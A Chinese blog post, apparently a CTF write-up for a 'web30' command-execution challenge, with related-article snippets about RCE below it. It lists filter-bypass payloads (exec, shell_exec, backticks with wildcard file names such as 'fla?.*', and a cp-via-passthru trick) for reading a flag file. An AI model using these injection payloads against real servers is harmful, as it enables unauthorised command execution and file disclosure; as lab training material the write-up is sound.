命令执行web30

已于 2023-12-04 14:10:05 修改
阅读量318 收藏 10
点赞数 10
文章标签: android
于 2023-12-04 13:37:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DJmutu/article/details/134781895
版权
文章讲述了在Web安全过滤下,如何利用echoexec、shell_exec等函数组合,以及cp命令绕过限制,实现文件内容的读取。作者通过实例演示了如何使用passthru执行命令,强调了日积月累的学习过程。
摘要由CSDN通过智能技术生成

本题过滤了flag system php

相比与web29,也就多了system和php,既然system被过滤了,那就换其他函数,php被过滤了,还是用通配符解决。

解法1

然后查看源代码

解法2

解法3

然后查看源代码

解法4

然后查看源代码

解法5

然后查看源代码

解法6

由上以及web29可以知道,system被过滤了但还有很多组合,例如:

echo exec("more fla?.*");

echo exec("less fla?.*");

echo exec("nl fla?.*");

echo shell_exec("more fla?.*");

echo shell_exec("cat fla?.*");

echo shell_exec("tac fla?.*");

echo shell_exec("less fla?.*");

echo shell_exec("nl fla?.*");

echo`more fla?.*`;

echo`cat fla?.*`;

echo`tac fla?.*`;

echo`less fla?.*`;

当然一定不只我列出来的这些。

现在在学习一个新的姿势,用cp命令。

先上实例

然后点Execute

最后在url后面加1.txt,然后点Execute

cp命令主要用于复制文件或目录。

语法: cp 源文件 目标文件

意思就是把flag.php复制到1.txt中,然后我们在访问url/1.txt查看1.txt里的内容。

当然我这里用的是passthru("")来执行命令,其他的行不行,去试试就可以了。

以上就是我在本题中的用到和自学到的命令,每天一题,不断积累。

DJmutu
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web执行linux命令行,Web页面执行shell命令
weixin_29138345的博客
04-29 2842
安装apache服务yum -y install httpd启动apachesystemctl restart httpd创建shell脚本cd /var/www/cgi-bin/vim shell#!/bin/shalias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"'echo -e "Content-type: tex...
命令执行Web服务
10-20
命令执行Web服务】是指通过特定的命令来调用和执行Web服务的一种技术。Web服务是一种基于网络的、能够被不同应用系统之间互相调用的软件接口,它使用标准的XML(可扩展标记语言)来定义其接口和数据传输格式。这种...
web安全-命令执行
qq_59350385的博客
02-23 3287
一、背景介绍 程序员使用脚本语言开发应用的过程中,脚本语言的开发十分快速,但是也伴随着一些问题。比如速度慢。如果我们开发的应用 ,特别是企业级的一些应用就需要去调用一些外部程序。当web应用需要调用一些外部程序是时就会用到一些执行系统命令的函数。 二、漏洞成因 应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令执行,在没有过滤的情况下就会造成命令执行漏洞。 三、相关函数 system(args)有回显 ...
web渗透命令执行,代码执行
2401_84445424的博客
07-02 1200
代码注入原理:网站对用户的输入过滤出现问题,同时网站的脚本编写用到一些危险函数eval(),assert()。如果被攻击者发现漏洞,直接可能造成攻击者完全控制整个web甚至是服务器。相当于web后门的存在。 命令注入 Command Injection:脚本语言开发网站功能十分迅速,但是,如果我们需要用到一些其他语言编写的程序呢,把结果返回给用户。那就会用系统的一些命令执行其他语言编写的程序。只要涉及到了这些,那么很可能就会存在用户输入没有过滤而导致命令执行漏洞。
Web漏洞-命令执行和代码执行漏洞
Ays.Ie的博客
03-13 1829
该篇描述了web漏洞-命令执行和代码执行漏洞
ctfshow-web入门-命令执行web37-web40)
Welcome To Myon'Blog !
06-07 1743
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。将我们想要执行的代码包含进去,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。就会显示容器有问题了。我们也可以采用编码绕过,对
Web页面执行shell命令
qq_43649264的博客
10-22 5771
本文以apache为web服务器为例 安装apache服务 yum -y install httpd 启动apache $ sudo systemctl restart httpd 创建shell脚本 $ cd /var/www/cgi-bin/ $ vim shell #!/bin/sh alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' echo -e "Content-type: text/pl
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1211
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令执行
Web的基本漏洞--命令执行漏洞RCE
尽欢的博客
05-31 1594
命令执行漏洞介绍
【web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
第30天-WEB 漏洞-RCE 代码及命令执行漏洞全解
MCTSOG的博客
03-15 2019
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。 RCE概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
web安全防护命令执行课件PPT
11-21
命令注入与命令执行概述】 命令注入和命令执行是网络安全中的关键概念,它们与Web应用程序的安全性密切相关。命令注入是一种攻击技术,攻击者通过输入恶意命令到应用或系统中,使其执行非预期的操作,通常源于...
Python命令启动Web服务器实例详解
09-21
### Python命令启动Web服务器实例详解 #### 概述 本文将详细介绍如何利用Python自带的库启动一个简单的Web服务器。此方法适用于快速搭建测试环境或进行轻量级的应用部署。通过几种不同的内置模块,用户能够根据...
Web开发常用的linux命令
07-06
- `sudo`: 以管理员权限执行命令。 - `systemctl`: 控制Systemd服务,例如启动、停止、重启。 4. 文件系统: - `/etc/fstab`: 配置文件系统挂载点。 - `df`: 查看磁盘空间使用情况。 - `du`: 查看文件或目录...
thinkphp漏洞之sql注入漏洞-builder处漏洞
最新发布
banliyaoguai的博客
08-09 500
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
android compose 设置 padding 和 margin
阿饱同学
08-08 277
在 Jetpack Compose 中,是一个非常灵活的布局工具。要在中设置padding和margin,需要分别使用padding修饰符和中的margin参数。
Android TV上OTT PWA应用开发的播放器选择:video.js vs exoplayer
Ranye的博客
08-08 257
本文从功能和性能两方面对比video.js和exoplayer的优劣
Chromium编译指南2024 - Android篇:前置要求(一)
守城小轩的技术窝棚
08-09 585
通过本篇文章,我们详细介绍了在 Android 平台上编译 Chromium 所需的前置要求,包括系统和硬件要求。确保您的开发环境满足这些要求,是成功编译 Chromium 的关键步骤。我们讨论了使用 Ubuntu 24.04 LTS 操作系统、安装 Git 和 Python 等必要软件,以及配备足够的 RAM 和磁盘空间的重要性。同时,我们强调了稳定高速的网络条件对于下载和同步源代码的影响。
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行(RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行(RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值